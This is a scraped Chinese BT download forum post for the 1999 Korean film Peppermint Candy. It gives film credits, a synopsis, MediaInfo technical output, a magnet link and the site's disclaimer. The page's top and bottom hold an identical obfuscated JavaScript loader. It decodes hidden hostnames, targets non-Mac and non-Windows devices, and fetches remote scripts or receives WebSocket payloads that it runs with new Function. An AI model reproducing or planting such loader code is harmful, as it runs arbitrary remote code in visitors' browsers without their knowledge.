薄荷糖[中文字幕].Peppermint.Candy.1999.1080p.FriDay.WEB-DL.H264.AAC 3.60GB

版主小s 1月前 493

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 薄荷糖 / Peppermint Candy

◎片 名 ????

◎年 代 1999

◎产 地 韩国 / 日本

◎类 别 剧情

◎语 言 韩语

◎上映日期 1999-10-14(釜山电影节) / 2000-01-01(韩国)

◎IMDb链接 https://www.imdb.com/title/tt0247613/

◎豆瓣评分 8.5/10 (52771人评价)

◎豆瓣链接 https://movie.douban.com/subject/1303145/

◎片 长 130分钟

◎导 演 李沧东 Chang-dong Lee (id:1103667)

◎编 剧 李沧东 Chang-dong Lee (id:1103667)

◎演 员 薛景求 Kyung-gu Sol (id:1045576)

文素丽 So-ri Moon (id:1010047)

金汝珍 Yeo-jin Kim (id:1011005)

徐情 Jung Suh (id:1018740)

高瑞熙 Seo-hie Ko (id:1213408)

李代延 Dae-yeon Lee (id:1042754)

金敬益 Kyung-ik Kim (id:1382166)

金仁权 In-kwon Kim (id:1006493)

孔炯轸 Hyeong-jin Kong (id:1191201)

刘承睦 Yoo Seung-Mok (id:1331784)

朴成妍 Seong-yeon Park (id:1394090)

赵汉哲 Han-chul Jo (id:1386180)

池大汉 Dae-han Ji (id:1351122)

姜善淑 Seon-sook Kang (id:1391222)

裴长秀 Jang-su Bae (id:1424325)

张浚浩 Joon-ho Jang (id:1383983)

徐进元 Jin-won Seo (id:1437870)

刘延洙 Yeon-soo Yoo (id:1401422)

孙钟焕 Jong-hwan Son (id:1459523)

上田诚 Makoto Ueda (id:1299717)

明桂南 Gye-nam Myeong (id:1134600)

金炯求 Hyung-ku Kim (id:1288539)

李江山 Kang-sang Lee (id:1434665)

崔铉基 Hyun-Ki Choi (id:1434573)

金玄 Hyun Kim (id:1393478)

◎标 签 李沧东 / 韩国 / 韩国电影 / 文艺 / 剧情 / 人生 / 薄荷糖 / 薛景求

◎简 介

1999年春天,对生活绝望的中年男子金永浩(薛景求饰),落魄地参与了同学会,他神经质般哭叫,并在高架桥上面对迎面而来的火车嘶喊:我要回去!

火车带着记忆倒走,三天前的金永浩已然崩溃,欲寻了断,但是被神秘人物叫去见一个人;再之后是1994年,他生活放荡,对妻子(金丽珍饰)冷若冰霜又出手大打;1987年身为警察的他,手段凶悍;1984年、1980年一直到1978年,直到第7个片段通过初恋情人(文素利饰)以及“薄荷糖”这一点题信物,影片才给出是什么碾压过主人公的生命,粉碎其美好的答案。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 172256233892955818213488714756540794553 (0x819758099484CCFB60B94ADB308F06B9)

  4. Complete name : [email protected]COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 3.60 GiB

  8. Duration : 2 h 10 min

  9. Overall bit rate : 3 956 kb/s

  10. Encoded date : UTC 2021-10-16 05:43:08

  11. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : AVC

  16. Format/Info : Advanced Video Codec

  17. Format profile : [email protected]

  18. Format settings : CABAC / 1 Ref Frames

  19. Format settings, CABAC : Yes

  20. Format settings, Reference frames : 1 frame

  21. Format settings, GOP : M=1, N=60

  22. Codec ID : V_MPEG4/ISO/AVC

  23. Duration : 2 h 10 min

  24. Bit rate mode : Constant

  25. Bit rate : 4 000 kb/s

  26. Width : 1 920 pixels

  27. Height : 1 080 pixels

  28. Display aspect ratio : 16:9

  29. Frame rate mode : Constant

  30. Frame rate : 29.970 (30000/1001/53354) FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.064

  36. Stream size : 3.48 GiB (97%)

  37. Language : English

  38. Default : Yes

  39. Forced : No


  40. Audio

  41. ID : 2

  42. Format : AAC LC

  43. Format/Info : Advanced Audio Codec Low Complexity

  44. Codec ID : A_AAC-2

  45. Duration : 2 h 10 min

  46. Bit rate : 125 kb/s

  47. Channel(s) : 2 channels

  48. Channel layout : L R

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 46.875 FPS (1024 SPF)

  51. Compression mode : Lossy

  52. Stream size : 117 MiB (3%)

  53. Title : Korean

  54. Language : Korean

  55. Default : Yes

  56. Forced : No


  57. Text #1

  58. ID : 3

  59. Format : UTF-8

  60. Codec ID : S_TEXT/UTF8

  61. Codec ID/Info : UTF-8 Plain Text

  62. Duration : 2 h 6 min

  63. Bit rate : 25 b/s

  64. Count of elements : 1140

  65. Stream size : 24.0 KiB (0%)

  66. Title : Chinese Simplified

  67. Language : Chinese

  68. Default : Yes

  69. Forced : No


  70. Text #2

  71. ID : 4

  72. Format : UTF-8

  73. Codec ID : S_TEXT/UTF8

  74. Codec ID/Info : UTF-8 Plain Text

  75. Duration : 2 h 6 min

  76. Bit rate : 25 b/s

  77. Count of elements : 1140

  78. Stream size : 24.0 KiB (0%)

  79. Title : Chinese Traditional

  80. Language : Chinese

  81. Default : No

  82. Forced : No




复制代码


TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:49E7F92F18333464B54E0B0D3F5BD205B222F3DA

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};